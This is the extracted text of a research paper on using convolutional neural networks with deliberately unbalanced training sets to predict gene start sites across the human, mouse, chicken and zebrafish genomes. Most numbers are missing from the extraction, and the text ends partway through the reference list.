université, paris, france laboratoire images, signaux et systèmes intelligents (lissi), université val-de-marne (paris xii), paris, france cnrs umr / inserm u - sorbonne université, museum national d’histoire naturelle (mnhn), paris, france institut universitaire de france, paris, france abstract application of deep neural network is a rapidly expanding field now reaching many disciplines including genomics. in particular, convolutional neural networks have been exploited for identifying the functional role of short genomic sequences. these approaches rely on gathering large sets of sequences with known functional role, extracting those sequences from whole-genome-annotations. these sets are then split into learning, test and validation sets in order to train the networks. while the obtained networks perform well on validation sets, they often perform poorly when applied on whole genomes in which the ratio of positive over negative examples can be very different than in the training set. we here address this issue by assessing the genome- wide performance of networks trained with sets exhibiting different ratios of positive to negative examples. as a case study, we use sequences encompassing gene starts from the refgene database as positive examples and random genomic sequences as negative examples. we then demonstrate that models trained using data from one organism can be used to predict gene-start sites in a related species, when using training sets providing good genome-wide performance. this cross-species application of convolutional neural networks provides a new way to annotate any genome from existing high-quality annotations in a related reference species. it also provides a way to determine whether the sequence motifs recognised by chromatin-associated proteins in different species are conserved or not. subjects bioinformatics, computational biology, data mining and machine learning keywords transcription start sites, promoters, genome annotation, deep learning, dna motifs, sequence evolution, unbalanced datasets introduction the improvement of dna sequencing techniques lead to an explosion in the number and completeness of fully sequenced genomes. one of the major goals in the field is to annotate these dna sequences, which is to associate a biological function with sequence motifs located at different positions along the genome (stein, ). in the human genome for instance, while some dna sequences encode proteins, most sequences do not code for any protein. many of these non-coding sequences are nevertheless conserved in related species and are necessary for the correct regulation of gene expression. deciphering the function of these non-coding sequences has been increasingly achieved through improvements in how to cite this article khodabandelou g, routhier e, mozziconacci j. . genome annotation across species using deep convolu- tional neural networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ghazaleh.khodabandelou@u-pec.fr mailto:ghazaleh.khodabandeh@gmail.com mailto:julien.mozziconacci@mnhn.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the throughput of next generation sequencing (rivera & ren, ). the . billion base pair (bp) long human genome is now annotated with many functional and bio-chemical cues (kundaje et al., ; encode project consortium et al., ), among which are the initiation sites of gene transcription (carninci et al., ; georgakilas, perdikopanis & hatzigeorgiou, ). while these annotations are becoming more numerous and precise, they cannot be determined experimentally for every organism and every cell type, as the experiments needed to produce these annotations are often costly and difficult to carry out. computational methods are therefore widely used to extract sequence information from known annotations and extrapolate the results to different genomes or conditions, e.g., kundaje et al. ( ) and durham et al. ( ). an related question is to understand the link between these annotations and the un- derlying dna sequence. to this end, supervised machine learning algorithms (goodfellow, bengio & courville, ) have been particularly successful (zou et al., ; angermueller et al., ). among those, deep convolution neural networks (cnns) are very efficient at detecting sequence features since they rely on the optimisation of convolution filters that can be directly matched to dna motifs (ching et al., ). stacking several of these convolution layers together can lead to the detection of nested motifs at larger scales. pioneering studies illustrated this ability of cnns to reliably grasp complex combinations of dna motifs and their relationship with functional regions of the genome (min et al., ; umarov & solovyev, ; alipanahi et al., ; zhou & troyanskaya, ; kelley, snoek & rinn, ; pachganov et al., ). min et al. ( ) used a cnn to predict enhancers, which are specific sequences that regulate gene expression at a distance. this method performed very well and ranked above state-of-the-art support vector machine based methods. similar tools were used in different contexts, aiming at identifying promoters (umarov & solovyev, ; pachganov et al., ) or detecting splice sites (leung et al., ; jaganathan et al., ). in these approaches, a sample set is first created by taking all positive class sequences (e.g., enhancers) and adding the same amount of randomly picked negative class examples (e.g., non- enhancers). this sample set is then divided into training, validation and test sets. balancing the data ensures that the model will be trained on the same number of positive and negative examples, thus giving the same importance to both classes. while these approaches are very successful when assessed on test sets derived from the sample set, we show here that they tend to perform poorly when applied on entire chromosome sequences as required for the task of complete genome annotation. this is due to the fact that the networks are optimised on a similar number of positive and negative examples during training, but that they will usually face very different ratios of negative over positive classes when used on a full chromosome sequence (he & garcia, ). alternative approaches (alipanahi et al., ; kelley, snoek & rinn, ) used unbalanced datasets for training (i.e., with more negative than positive examples) to predict dna-binding sites for proteins and genome accessibility. in these two studies, however, the prediction performance of the model is also assessed on test sets derived from training sets, not on full genomic sequences. the task of genome-wide prediction has been assessed in a more recent study aiming at identifying cell type specific regulatory khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. elements (kelley et al., ). in order to infer long range relationships between these elements, kelley et al. used very long ( kb) non-overlapping windows covering the whole genome. this approach has proven efficient but requires a lot of computational memory. as our goal is to provide genome-wide predictions, the methodology we used is inspired from this last study. since we do not aim here at predicting cell type specific features, we could use shorter sequences as input and a simpler network architecture. we also present two novelties for the development and for performance assessment of genome-wide predictions. firstly, we do not use as a quality measure the classical prediction scores computed on test sets obtained by dividing the sample data into training, validation and test sets as commonly done in machine learning. rather, we compute prediction scores that assess the ability of our model to annotate a full chromosome sequence by designing a specific metric (described in material and methods). secondly, we change the ratio between positive and negative examples in order to obtain the highest prediction scores and show that this tuning is has an important effect on the outcome. as a proof of principle, we use in this work gene start sites (gss) as features. dna motifs around gss are recognised by the transcription machinery and indicate the location of the initiation of transcription (kugel & goodrich, ). the dna sequence surrounding gss therefore contains the information that could in principle be used by an algorithm to identify in silico the gss locations. these dna sequence motifs are different for different classes to genes. for instance, protein coding genes can have either cg di-nucleotide (cpg) rich or poor sequences upstream their gss (deaton & bird, ). we show that using training sets with a higher ratio of negative over positive examples, we can faithfully retrieve gss positions, with performances varying for different classes of genes such as coding or non coding genes. we then propose a new application of cnns in genomics that leverages the fact that similar organisms tend to have similar regulatory mechanisms, i.e., rely on homologous molecular machinery and on homologous dna regulatory motifs. exploiting these homologies, we first train a model on a dataset corresponding to a given organism and use it to predict the annotation on the genome of a related organism, opening new opportunities for the task of de-novo genome annotation. we show that a cnn trained on gss containing regions in human is able to recover regions containing gss in the mouse genome and vice versa. we also assess the generalisation of the approach to more distant species, taking as examples gallus gallus and danio rerio. methods input generation genomic sequences were downloaded for the reference genomes for human (hg ), mouse (mm ), chicken (gg ) and zebrafish (dr ) via the urls shown in table . similarly, gss positions for each genome were extracted from their respective ncbi refseq reference gene annotations (refgene). as a positive input class, we use regions of bp flanking gss (i.e., ± bp around the gss) which are supposed to contain multiple sequence signals indicating the presence khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table url of the data used in the present work. genomes human https://hgdownload.soe.ucsc.edu/goldenpath/hg /bigzips/hg .fa.gz mouse https://hgdownload.soe.ucsc.edu/goldenpath/mm /bigzips/chromfa.tar.gz chicken https://hgdownload.soe.ucsc.edu/goldenpath/galgal /bigzips/galgal .fa.gz zebrafish https://egg.wustl.edu/d/danrer /refgene.gz reference gene human https://egg.wustl.edu/d/hg /refgene.gz mouse https://egg.wustl.edu/d/mm /refgene.gz chicken https://egg.wustl.edu/d/galgal /refgene.gz zebrafish https://egg.wustl.edu/d/danrer /refgene.gz of a gss to the transcription machinery of the cell. for instance in the human genome, , gss positions are extracted on both dna strands ( , for the positive strand and , for the negative strand). in order to generate the negative class, we select , ×q sequences of bp at random positions on a random strand, rejecting regions that do contain a gss. the odds of getting at random a genomic region containing a gss are close to . %. for q= , there is an equal number of negative and positive class examples. unbalanced datasets are produced using different values of q ranging from to . for q= , the negative class encompasses × × k≈ gb, which represents one third of the human genome. for the other genomes a similar procedure was implemented. the total number of gss used was , for the mouse, for the chicken and for the zebrafish. convolution neural network (cnn) a cnn (see fig. ) is trained in order to predict the presence of a gss in a dna sequence of size bp. the shape of the input layer is c×b in which c = is the number of different nucleotides and b= is the length of the input sequence. the nucleotide sequences are one hot encoded so that a=( , , , ), t=( , , , ), c=( , , , ), and g=( , , , ). the training set contains n samples of labelled pairs (x(n),y(n)), for n∈{ ,...,n}, where x(n) are matrices of size c×b and y(n) ∈{ , }. each x(n) is associated with y(n) = when it corresponds to a region containing a gss and y(n) = otherwise. the first convolution layer consists of k kernels of length s which are applied on b−s+ successive sequences at positions p∈{ ,...,(b−s+ )} to recognise relevant dna motifs of size s. this operation generates an output feature map of size k×(b−s+ ) for an input x(n) of size c×b. the feature map m resulting from the convolution operation is computed as follows: mp,i= c∑ j= s∑ r= wi,j,rxp+r− ,j+bi, i∈{ ,...,k} ( ) where w denotes the network weights with size (k×c×s) and b denotes the biases with size (k× ) (see e.g., goodfellow, bengio & courville, ). after the convolution layer a non-linear function is applied to the output, here a rectified linear unit (relu). this khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://hgdownload.soe.ucsc.edu/goldenpath/hg /bigzips/hg .fa.gz https://hgdownload.soe.ucsc.edu/goldenpath/mm /bigzips/chromfa.tar.gz https://hgdownload.soe.ucsc.edu/goldenpath/galgal /bigzips/galgal .fa.gz https://egg.wustl.edu/d/danrer /refgene.gz https://egg.wustl.edu/d/hg /refgene.gz https://egg.wustl.edu/d/mm /refgene.gz https://egg.wustl.edu/d/galgal /refgene.gz https://egg.wustl.edu/d/danrer /refgene.gz http://dx.doi.org/ . /peerj-cs. figure overview of the cnn model. a total of bp-long sequences were one hot encoded into a × input matrix. the first cnn layer performs a convolution on each input matrix to recognise rel- evant motifs. the next convolutional layers models the interplay among these motifs to grasp higher-level features. max-pooling layers reduce the dimensions of the layers. the model is trained to correctly label input sequences as gss or non-gss. the output layer of the trained network then gives a probability for any bp region to contain a gss. it can be applied along a full chromosome, i.e., on all bp-long se- quences with a bp shift. full-size doi: . /peerjcs. /fig- activation function computes frelu (m)=max( ,m) to incorporate non-linearity by transforming all negative values to zero. in order to reduce the input dimension we apply a max-pooling process with a pool size m over the output of frelu (m). similar convolution layers followed by relu and max-pooling are added sequentially on the input of the first layer to grasp higher order motifs. the output of the last max-pooling layer is then fed into a fully connected layer which output x is transformed by a softmax layer, i.e., a sigmoid function (φ= +e−x ), in order to give the final output of the cnn. this final score of the input sequence is ideally for non-gss and for gss containing sequences. when we need to perform a classification we use a threshold of . to discriminate between the two classes. in the training phase, the weights and biases of the convolution layers and the fully connected layer are updated via back-propagation (rumelhart, hinton & williams, ) in a way which decreases the loss, which measures the discrepancy between the network predictions and the reality averaged over individual examples. we use here the binary cross-entropy computed as: l=− /n n∑ i= [y(n)log(ŷ(n))+( −y(n))×log( − ŷ(n))] ( ) where ŷ(n) is the estimated score for the input sample x(n). as data are imbalanced for q> , the model may reach a local optimum when predicting the non-gss class for all input sequences. in order to deal with this issue, we attribute different weights to the positive and negative classes. we assign a greater importance to the less represented gss class by multiplying the associated term in the loss by a weight cw = number of non-gssnumber of gss =q. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. one of the important issues of any learning algorithm is overfitting. overfitting occurs when one achieves a good fit of the model on the training and validation data, while it does not generalise well on new, unseen data. to deal with this issue, a regularisation procedure called dropout is usually used (srivastava et al., ). in the training step, some outputs of the pooling layers are randomly masked while the remaining information is fed as inputs for the next layer. implementation we implement cnn using keras library (chollet et al., ) and tensorflow (abadi, agarwal & barham, ) as back-end. training on a gpu is typically faster than on a cpu. we use here a gtx ti gpu. we use adaptive moment estimation (adam) to compute adaptive learning rates for each parameter (kingma & ba, ). adam optimiser is an algorithm for first-order stochastic gradient-based optimisation of functions, based on adaptive estimates of lower-order moments. the network architecture (see fig. ) is detailed in table . the models are trained for epochs and they mostly converge rapidly (around – epochs, we use early stopping to prevent overfitting). hyper-parameters tuning is detailed in the supplementary materials. source codes are available at https://github.com/studytss/deeptss/. genome wide performance measure different measures have been developed in order to assess the performance of different models on conventional test sets, i.e., test sets derived from a subset of the initial data. such measures are described in details in the corresponding supplementary materials section. in our case, we want to apply our model on all the bp windows spanning a full chromosome and eventually chromosomes from other species. specifically, the model was tested on chromosome which was withdrawn from the training set. we therefore developed a measure to evaluate the performance of the trained models in this case. this metric, calledλ, measures the enhancement of the predicted signal specifically in the regions surrounding the known gss. we use in the present papers regions of length r = bp. to compute λ, we first compute the genome-wide z-score (kreyszig, ) zg = yg−µ̄ σ from the predictions yg where g denotes positions on the genome, and µ̄ and σ stand for the prediction mean and standard deviation, respectively. we extract zgss, the zg signal over kb windows centred on each gss of the test region, e.g., a full chromosome. zg is a d-array whose rows correspond to different genes and columns to different distances to the gss. we then average element-wise zgss over all gss, i.e., along all rows. this gives us s, the average of the z-transformed prediction score in a kb window around all gss. in order to measure the signal increase close to the gss, that we call λ, we compute the average of the curve s on a region of r bp centred on the gss. a higher value of λ corresponds to a higher signal-to-noise ratio around the gss. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/studytss/deeptss/ http://dx.doi.org/ . /peerj-cs. table network architecture of the cnn model. the first column depicts the different layers used con- secutively in the network. the ’’layer shape’’ column reports the shape of the convolutional kernels, the max-pooling windows and the fully connected layers. the ’’output shape’’ column reports the variation of layer shapes at each step. layer name layer shape output shape input – × × conv d × ×( × ) × × max-pooling × × × dropout – × × conv d × ×( × ) × × max-pooling × × × dropout – × × conv d × ×( × ) × × max-pooling × × × dropout – × × dense dropout – dense (sigmoid) results training models for genome annotation of gss the problem of detecting human gss using deep neural networks has been tackled in (umarov & solovyev, ). we first follow a similar approach and use a balanced dataset (see methods for details). the model is trained/validated on an equal number of bp long positive and negative examples and is evaluated on a test set composed of % of the original data that was left aside prior to training. the specificity (sp), the sensitivity (sn) and the matthews correlation coefficient (mcc, chicco & jurman, ) (see supplemental information for definition) were found to be similar to the ones found in (umarov & solovyev, ) which used a similar approach albeit separating the sample data into tata-containing gss and non-tata gss (sp = . , sn = . and mcc = . ). in order to assess how this model would perform as a practical tool for detecting gss on a genome-wide scale, we apply it on all the sequences along chromosome (which has been withdrawn from the training phase, i.e., from the training and validation sets) obtained using a bp long window sliding with an offset of bp. figure a illustrates the predictions of the cnn model over a typical region of kbp containing out of the gss of chromosome . although the predictions yield higher scores over gss positions, they also yield high scores over many non-gss positions reflecting a low signal-to-noise ratio. this is due to the fact that the reality is biased in the training phase during which the cnn model learns an equal number of examples from the positive and the negative classes (he & garcia, ). applied over all the -bp sequences of chromosome , the model encounters many more examples of the negative class and fails to generalise to the new examples. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure cnn predictions for two regions of chromosome . (a) prediction scores for balanced * model (q = ) and unbalanced * model (q = ), respectively in blue and red on a kb region. the position of genes is indicated below. the annotation track was done using the uwash epigenome browser (https://epigenomegateway.wustl.edu/). both models detect gss positions, but the * model re- turns a higher background signal at non gss positions. adding negative examples using the * model mitigates the noise while preserving the high scores over gss. (b) application of * models, trained on different datasets, over a . kb region of chromosome . at each site, the maximum and minimum pre- diction scores are respectively displayed in black and red. other prediction scores are plotted in grey. full-size doi: . /peerjcs. /fig- to address this issue and train a network for genome annotation, we propose a heuristic where more negative examples are added into the balanced dataset to reduce the importance of the positive class during training and to allocate more weight to the negative class. we call these augmented datasets limited unbalanced datasets. the parameter q is the ratio between negative and positive training examples and denote as q∗ models trained with the corresponding ratio. for instance, on fig. a the model trained on the balanced data yielding to blue signal predictions is denoted as ∗. we train our cnn model on a * dataset (q= ) and assess the efficiency of the trained model. as depicted on fig. a by a red signal, the predictions for this model display a much higher signal-to-noise ratio, with significant peaks over each of the gss (c orf , ifnar , il rb, ifnar , ifngr , tmem b, dnajc ) and a much weaker signal between these sites. predicting gss using the * model is thus expected to generate fewer false positives than the * model, regardless the value of the threshold used to identify gss-containing regions. in order to khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://epigenomegateway.wustl.edu/ https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. assess how changing the value of q affects gss classification, we apply a threshold on the prediction and compute the precision and the recall obtained for both models (i.e., * and *) at bp resolution on a full chromosome. the precision recall curves confirmed the compromising effect of a lower signal-to-noise ratio on the accuracy of the classification (fig. s ). for the sake of completeness, the performance of more models ( *, *, *, *, *, *) evaluated using conventional metrics on test sets derived from the initial sample sets can be found in supplemental information . investigating the effect of random selection of the negative examples on predictions while positive examples are always the same in different sample sets, the negative examples are randomly picked out of the genome. the performance of the model in different regions of chromosome can thus vary for different training sets (wesolowska-andersen et al., ). to investigate this variation, we set up balanced ∗ datasets and train cnns separately. the models are then applied over human chromosome to study the fluctuations of the predictions. the variation of predictions is depicted in fig. b. the first observation is that almost all predictions present a peak over the dip a gss. however, the large gap between the minimum and maximum predictions underlines the variability of predictions obtained with different training datasets. this variability illustrates the uncertainty of the predictions obtained from a single cnn trained on a balanced dataset and highlights the need to use limited unbalanced datasets for the task of genome annotation. comparing * and * models over a full chromosome models trained on * and * sets are applied to the full chromosome and the z-normalized prediction scores around gss are presented as heat-maps. while the * model (fig. a) presents a noisy signal around gss positions, the * model (fig. b) presents a higher signal-to-noise ratio. to investigate the performance of different models on a genome-wide scale we devised a custom metric λ which measures the average signal-to-noise ratio around gss (see methods for the definition of λ). figures c, d illustrate the average of the z-score over all the gss of chromosome for the models * and *, respectively, and λ denotes the average of this average over a r = bp region centred on the gss. a larger λ score corresponds to a higher signal-to-noise ratio. in this particular case, we find a λ score of . and . for the * and * model, respectively. to illustrate the variability of prediction scores achieved around different gss, we randomly selected four gss within the chromosome. the first gss corresponds to the gene cxadr, shown in fig. e. while the prediction of * model results in a low averaged z-scores over all positions, the averaged z-score of * model strongly peaks around the gss position and shows low variations over non-gss positions. figure f depicts the second selected gss corresponding to the krtap - gene. this gene is part of a cluster of similar genes belonging to the family of keratin associated proteins (highlighted by a yellow rectangle on figs. a, b). for this particular cluster, the predictions are poor for khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure comparison of the * and * models predictions over chromosome . (a) and (b) heat maps depict the z-score of the prediction for the * and * models respectively on , bp flanking each gss of chromosome . (c) and (d) averaged z-score of the predictions over each gss of chromo- some . (e–h) zoom on regions around randomly selected gss. genes are indicated at the bottom of each plot. (i–k) averaged z-score of the predictions over each gss of mouse chromosome x (i) and for networks trained on mouse/human chromosomes (except x) and applied on human/mouse chromosome x (j,k). full-size doi: . /peerjcs. /fig- both * and *, probably reflecting a specific gss signature that has not been grasped by the model. another example of gene cluster with a poor prediction score for gss is the t-rna cluster, highlighted in green in figs. a, b. figures g, h displays the predictions around the gss of the scaf and, pcnt and c orf genes, respectively. on these more typical gss the * model shows a higher signal-to-noise ratio than the * and regions containing gss are detected. these regions often stretch over kb while our training sequence centred on each gss is only bp long. this could indicate the presence either of alternative gss close to the annotated gss or of similar sequence patterns in broader regions surrounding the gss (carninci et al., ; sandelin et al., ). learning and predicting in human and mouse to show the potential of our annotation method in a different context, we replicate a similar gss analysis in mouse. models with values of q ranging from to trained on mouse chromosomes (except x) are applied over the mouse chromosome x to assess the model performance (see fig. i, and figs. s a, s d, s g). the averaged z-score of λ reaches values of . and . respectively for the * and * models in quantitative agreement with the model performance in human. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. mammals show a substantial degree of homology in the dna sequence found at gss (waterston et al., ), and earlier computational models were trained to recognise transcription start site in any mammalian species (down & hubbard, ). this study focused on sequences, of which were kept aside for test purposes and we want here to extend the validity of this initial study at the genome wide level. following this line, we determine the possibility of predicting gss in one organism with a network trained on a related organisms. this possibility has previously been shown to be effective for sequence variants calling (poplin et al., ) to this end, the mouse trained model is applied on human chromosome x and the human trained model is applied on mouse chromosome x. the two chromosomes carry homologous genes (waterston et al., ), the number of annotated gss varies with a total of , gss in human and , gss in mouse. while the model trained and applied on mouse shows a better signal-to-noise ratio, the same model applied to human chromosome x still captures most of the gss and gives a λ score of . for the * model (see fig. j and figs. s b, s e, s h). similarly, the models trained on human capture most of gss on the mouse x chromosome as shown in fig. k and figs. s c, s f, s i and reaches a λ score of . for the * model. in all cases, the signal-to-noise ratio is improved in the * models with respect to the * models. the human model applied on human provides the highest scores for both * and * models probably a signature of an overall better gss annotation. evaluation of the prediction for different gss classes the potential of our trained networks to recover gss containing regions along the human and mouse genomes is assessed in the previous parts without any distinction between different gss classes. since we find that some gss are better predicted than others (fig. ), we compute the λ score independently for the two main classes of gss: mrna-gss and ncrna-gss. while λ is higher for the mrna-gss class, the model is versatile and is also able to predict the ncrna-gss (fig. b). in human and mouse, mrna-gss are found in different classes, that can be derived from the cpg content of the region flanking the gss. high cpg regions, also called ‘‘cpg island’’ can be methylated and play an important role in gene regulation (deaton & bird, ). figure a displays the distribution of the cpg number in bp regions surrounding the all mrna-gss for the mouse and human x chromosome. from this distribution, we identify three classes of mrna-gss with respectively a high, medium and low cpg content. high cpg gss correspond to genes regulated by dna methylation and have been shown to exhibit a different pattern of chromatin modifications (vavouri & lehner, ). assessing the performance of the model for the three different classes, we find that better scores are obtained for cpg richer gss (fig. b). the worst performing gss are low cpg content gss which are hardly recovered by our model. in order to test whether cpg content alone could be used to predict gss we computed the λ score over all gss using the z-normalized cpg content as predictor. we get values of . and . respectively for the human and mouse gss indicating that the cpg content is a strong indicator of the present of gss but that our models use as well other features which allow them to reach much higher scores. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure evaluation of the model performance for different classes of genes. (a) and (b) cpg number in bp regions centred on mrna-gss in x chromosomes for human (a) and mouse (b). these regions were divided in three groups of similar size according to their cpg number into low, medium and high groups (the bounds are % and % for human and % and % for mouse). the proportion of genes in each class is similar on the x chromosome (test set) than on other chromosomes (training and valida- tion sets). (c) lambda values computed for networks trained on each species non-x chromosome gss (t) and predicted on either species’ x-chromosome gss (p). lambda values for each mrna-cpg sub-group and ncrna genes are also shown to highlight different levels of performance. full-size doi: . /peerjcs. /fig- application of the approach to other vertebrates the performance of a cnn trained on human gss to recover mouse gss is not surprising given the similarity between their genomes (waterston et al., ). we next set out to apply the same methodology on more diverse species, including chicken and zebrafish (fig. ). four cnns were trained on all the gss from the genomes of homo sapiens (human), mouse musculus (mouse), gallus gallus (chicken) and danio rerio (zebrafish). g.g. and d.r. are model organisms, and together with h.s. and m.m. provide the most comprehensive gss annotations for mammals, birds and fishes. these four cnns were khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lambda scores obtained with cnn trained on four different species: human, mouse, chicken and zebrafish. lambda scores are computed from predictions done on gss of (a) human, (b) mouse, (c) chicken and (d) zebrafish chromosomes. full-size doi: . /peerjcs. /fig- then applied genome wide on each of the four species and the λ metric is computed for each chromosome independently, using a r value of bp (see methods). the results for the human and mouse genomes are very similar, with only a slightly better performance when the model trained on a species is applied on the same species. the model trained on the chicken genome performs less well when applied on the mammalian genomes and the model trained on the zebrafish genome is not able recover the mammalian gss as shown by a λ value of . when applied on the chicken genome, the mouse and human models surprisingly outperform the chicken model, probably because the gss annotation is better in the two mammals so that the training phase is more efficient. this result highlights the potential of the method when used across different species when the genome of one species is more precisely annotated. when applied on the zebrafish genome on the other hand, the human, mouse and chicken models all show poor performances while the zebrafish model performs well. this is in line with the fact that the cpg composition of zebrafish regions around gss if very different than in chicken and mammals. cpg islands, which are high density cpg regions, are found upstream of many gss for coding genes in chicken and mammals while they are less abundant in the zebrafish’s genome which has a low gc content (han et al., ). all together, these results suggest that the molecular machinery that interprets the genome sequence in order to find start sites of genes has a similar specificity in human, mouse and chicken, but a different specificity in zebrafish. conclusions with the surge of dna sequencing technologies, over a million genome datasets are now available and petabases of transcripts are sequenced every year to annotate these datasets with functional marks (wainberg et al., ). it has not escaped the notice of many computational biologists that deep neural networks are a key tool to deal with this exponentially increasing amount of data (wainberg et al., ). one possible application is to leverage datasets with good annotations in order to train neural networks and to predict annotations on other datasets. one of the practical issues when applying neural networks khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. on genomic sequences is unbalanced data, a well-known issue in the machine learning literature (he & garcia, ; chawla, japkowicz & kotcz, ; batista, prati & monard, ). in the present paper, we address this problem using gss as a case study. indeed, gss occupy only a few locations on the genome ( , gss for human) leading to extreme unbalances in datasets (i.e., the ratio of gss-containing bp windows to non-gss in the human genome is / ). in this case, the lack of examples of the minority class (i.e., true gss) impacts the learning process as conventional machine learning algorithms usually measure the model performance on the majority class (i.e., non-gss) leading to biased or inaccurate prediction of the minority class. to deal with this disparity, we adopt a weighting strategy to decrease the importance of the majority class samples (non-gss) during the learning process thereby improving identification of the rare minority class samples (gss). using this approach, which we call ‘‘limited unbalanced datasets’’, we show that learning on imbalanced datasets can be performed effectively, and that for gss recognition, a ratio of to positive over negative examples is usually sufficient to achieve a good signal to noise ratio in the prediction. this approach can be easily extended to identify other functional regions in any annotated genome. we also show that our method can be efficiently used across genomes of different species, i.e., training the model on one genome and applying it to another genome. we use the x chromosomes of human and mouse gss as a case study, and apply models trained on each one’s other chromosomes to its own and the other one’s x chromosome. while the sequence of this chromosome has evolved differently in both species, many genes are homologous (sinha & meller, ). the fact that we are able to recover gss in mouse/human with a model trained on the other organism suggests that the machinery capable of recognising gss in each organism is overall conserved. we also show that this methodology can be applied to more distant species, and use as examples chicken and zebrafish. our results point toward a higher similarity between mammal and chicken while zebrafish gss cannot cannot be reliably predicted with models trained on mammal and chicken sequences. while the genome sequence conservation can be computed directly from dna sequences, further developments of our method may provide a new tool to quantify more complex patterns of similarity between different organism’s nuclear machinery that interprets dna sequences in vivo. acknowledgements we would like to thank léopold carron for helping us with datasets, hugues roest croeluis for discussions, michel quaggetto for technical support and annick lesne for comments on the manuscript. we also wish to thank our editor james procter and the two anonymous referees for their invaluable work. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by the agence nationale pour la recherche [hiresbac anr- -ce - - ]. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: agence nationale pour la recherche [hiresbac anr- -ce - - ]. competing interests the authors declare there are no competing interests. author contributions • ghazaleh khodabandelou conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • etienne routhier performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • julien mozziconacci conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available at github: https://github.com/studytss/deeptss. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abadi m, agarwal a, barham p. . tensorflow: large-scale machine learning on heterogeneous systems. available at https://www.tensorflow.org/ . alipanahi b, delong a, weirauch mt, frey bj. . predicting the sequence speci- ficities of dna-and rna-binding proteins by deep learning. nature biotechnology ( ): – doi . /nbt. . angermueller c, pärnamaa t, parts l, stegle o. . deep learning for computational biology. molecular systems biology ( ): – doi . /msb. . batista ge, prati rc, monard mc. . a study of the behavior of several methods for balancing machine learning training data. acm sigkdd explorations newsletter ( ): – doi . / . . khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/studytss/deeptss http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.tensorflow.org/ http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /msb. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. carninci p, sandelin a, lenhard b, katayama s, shimokawa k, ponjavic j, semple ca, taylor ms, engström pg, frith mc. . genome-wide analysis of mam- malian promoter architecture and evolution. nature genetics ( ): – doi . /ng . chawla nv, japkowicz n, kotcz a. . special issue on learning from imbalanced data sets. acm sigkdd explorations newsletter ( ): – . chicco d, jurman g. . the advantages of the matthews correlation coefficient (mcc) over f score and accuracy in binary classification evaluation. bmc ge- nomics ( ): . ching t, himmelstein ds, beaulieu-jones bk, kalinin aa, do bt, way gp, ferrero e, agapow pm, zietz m, hoffman mm. . opportunities and obstacles for deep learning in biology and medicine. journal of the royal society interface ( ): – doi . /rsif. . . chollet f. . keras. available at https://keras.io. deaton am, bird a. . cpg islands and the regulation of transcription. genes & development ( ): – doi . /gad. . down ta, hubbard tj. . computational detection and location of transcrip- tion start sites in mammalian genomic dna. genome research ( ): – doi . /gr. . durham tj, libbrecht mw, howbert jj, bilmes j, noble ws. . predictd parallel epigenomics data imputation with cloud-based tensor decomposition. nature communications ( ): – doi . /s - - -w. encode project consortium. . an integrated encyclopedia of dna elements in the human genome. nature ( ): – doi . /nature . georgakilas gk, perdikopanis n, hatzigeorgiou a. . solving the transcrip- tion start site identification problem with adapt-cage: a machine learn- ing algorithm for the analysis of cage data. scientific reports ( ): – doi . /s - - - . goodfellow i, bengio y, courville a. . deep learning. cambridge: mit press. han l, su b, li wh, zhao z. . cpg island density and its correlations with genomic features in mammalian genomes. genome biology ( ): – doi . /gb- - - -r . he 